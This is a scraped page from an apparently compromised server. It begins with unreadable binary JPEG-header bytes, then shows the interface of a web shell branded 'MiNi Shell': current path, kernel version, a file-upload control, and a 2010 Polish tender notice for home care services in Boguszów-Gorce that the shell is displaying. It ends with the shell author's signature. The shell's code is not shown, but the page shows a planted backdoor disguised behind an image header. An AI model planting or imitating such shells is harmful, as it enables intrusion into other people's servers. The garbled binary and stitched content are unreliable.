JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/16996-N-2010.html

<p class="kh_header"><b>Boguszów-Gorce: Świadczenie w miejscu zamieszkania usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi  - podopiecznych Ośrodka Pomocy Społecznej w Boguszowie-Gorcach</b><br>
<b>Numer ogłoszenia: 16996 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Kasprzaka 7, 58-370 Boguszów-Gorce, woj. dolnośląskie, tel. 074 8449561, 8441913, faks 074 8449561, 8441913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.boguszow-gorce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie w miejscu zamieszkania usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi  - podopiecznych Ośrodka Pomocy Społecznej w Boguszowie-Gorcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonywanie usług opiekuńczych oraz specjalistycznych usług opiekuńczych w miejscu zamieszkania klientów Ośrodka Pomocy Społecznej w Boguszowie-Gorcach. Usługi wykonywane będą dla klientów OPS w Boguszowie-Gorcach, uprawnionych do korzystania z tych usług, na podstawie decyzji administracyjnej określającej miesięczną liczbę godzin przyznanych usług oraz odpłatność. Usługi mają być świadczone w mieszkaniach klientów przez 5 dni w tygodniu od poniedziałku do piątku w dni powszednie, w godzinach 7.30-15.30 oraz w uzasadnionych przypadkach w soboty, w godzinach od 7.30 do 15.30. 

1. Przez usługi opiekuńcze należy rozumieć usługi dostosowane do szczególnych potrzeb osób wymagających pomocy w formie usług opiekuńczych wynikających m. in. z rodzaju  schorzenia. Obejmują one w szczególności:
- pielęgnację i terapię zleconą przez lekarza;
- zaspokajanie codziennych potrzeb życiowych osób wymagających opieki;
- dokonywanie zakupów, załatwianie spraw osobistych podopiecznego;
- podstawową opiekę higieniczno - sanitarną;
- pomoc w utrzymywaniu więzi ze środowiskiem;
- usprawnianie do funkcjonowania w społeczeństwie;
- inne czynności wynikające z potrzeb stwierdzonych w miejscu zamieszkania klienta.
Przedmiotem zamówienia jest świadczenie w miejscach zamieszkania usług opiekuńczych dla podopiecznych OPS w Boguszowie-Gorcach, w okresie od 15.02.2010 do 31.12.2011 w łącznym przewidywanym wymiarze około 21.712 godzin dla ok. 31 osób. Szacunkowy wymiar usług opiekuńczych wynosi 965 godzin miesięcznie, tj. ok. 11.580 godzin w roku zapewniających pomoc i opiekę dla 31 podopiecznych wymagających pomocy innych osób, w oparciu o art. 17 ust. 1 pkt 11, art. 50 ust. 1- 5 ustawy z dnia 12 marca 2004 roku o pomocy społecznej (tj. Dz. U. z 2008 r. nr 115, poz. 728 z późn. zm.).

2. Specjalistyczne usługi opiekuńcze dotyczą osób dorosłych i obejmują w szczególności rodzaje usług specjalistycznych, o których mowa w § 2 pkt 1 lit. a - e oraz pkt 2 lit. a - g rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. Nr z 2005 r. Nr 189 poz. 1598 z późn. zm.).
Przedmiotem zamówienia jest świadczenie w miejscach zamieszkania specjalistycznych usług opiekuńczych dla dorosłych podopiecznych OPS w Boguszowie-Gorcach, w okresie od 15.02.2010 do 31.12.2011 w łącznym przewidywanym wymiarze około 4.477 godzin. Szacunkowy wymiar specjalistycznych usług opiekuńczych wynosi 199 godzin miesięcznie, tj. ok. 2.388 godzin w roku zapewniających pomoc i opiekę dla 5 podopiecznych wymagających specjalistycznych usług opiekuńczych, o których mowa w w § 2 pkt 1 lit. a - e oraz pkt 2 lit. a - g rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. Nr z 2005 r. Nr 189 poz. 1598 z późn. zm.).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.21.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1.Posiadający uprawnienia do wykonywania określonej  działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3.Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4.Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2.   Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy: 
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne 
      z art. 22 ust. 1 pkt 1-4 Prawa zamówień publicznych, 
2.2 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa 
      zamówień publicznych, 
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem 
 prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty 
 osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział 
      tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego 
     postępowania, 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub 
 dokumentów potwierdzających spełnianie tych warunków lub złożone 
  dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 Prawa zamówień 
      publicznych, 
3. Zamawiający odrzuca ofertę jeżeli: 
3.1 jest niezgodną z ustawą, 
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
      z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych, 
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
      o zwalczaniu nieuczciwej konkurencji, 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, 
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
      o udzielenie zamówienia, 
3.6 zawiera błędy w obliczeniu ceny, 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził 
  się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Prawa 
      zamówień publicznych, 
3.8 jest nieważna na podstawie odrębnych przepisów. 
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie 
    w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu 
    metodą warunku granicznego - spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki: 
    A.1) Formularz ofertowy (Załącznik Nr 1) - wypełniony i podpisany przez wykonawcę, 
    A.2) Parafowany wzór umowy (Załącznik nr 5),

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie Prawa zamówień publicznych składa następujące dokumenty: 
   B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
   B.2) Oświadczenie Wykonawcy, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne. 
   B.3) Dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. 
   B.4) Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych oraz o braku podstaw do wykluczenia z art. 24 Prawa zamówień publicznych - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do SIWZ. 
   B.5) Polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 

C. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
    C.1) wykaz wykonanych w okresie ostatnich 3 lat usług tożsamych z przedmiotem zamówienia (usług opiekuńczych lub specjalistycznych usług opiekuńczych) z podaniem ilości świadczeń (godzin usług), ich wartości, przedmiotu, dat wykonania i odbiorców, z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - Załącznik Nr 4 do SIWZ. 
Ocena spełnienia warunków 	udziału w postępowaniu zostanie dokonana wg formuły spełnia -  nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Zamawiający wezwie w trybie art. 26 ust. 3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: 
     D.1) Zamiast dokumentów, o których mowa w pkt. B.1) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające 	odpowiednio,  że: 
            1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
            2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów wskazanych w niniejszym pkt. D, zastępuje 	się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu         zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. D. 

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
    E.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku 	dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.  Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B.1), B.2), B.3), dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 
F. Postanowienia dotyczące składanych dokumentów 
    F.1) Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę-osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. 
    F.2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem  przez tłumacza przysięgłego na język polski.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.boguszow-gorce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Boguszowie-Gorcach, ul. Kasprzaka 7, 58-370 Boguszów-Gorce, pok. nr 4 (sekretariat) w godz. 8.00 - 15.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul. Kasprzaka 7, 58-370 Boguszów-Gorce, pok. nr 4 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com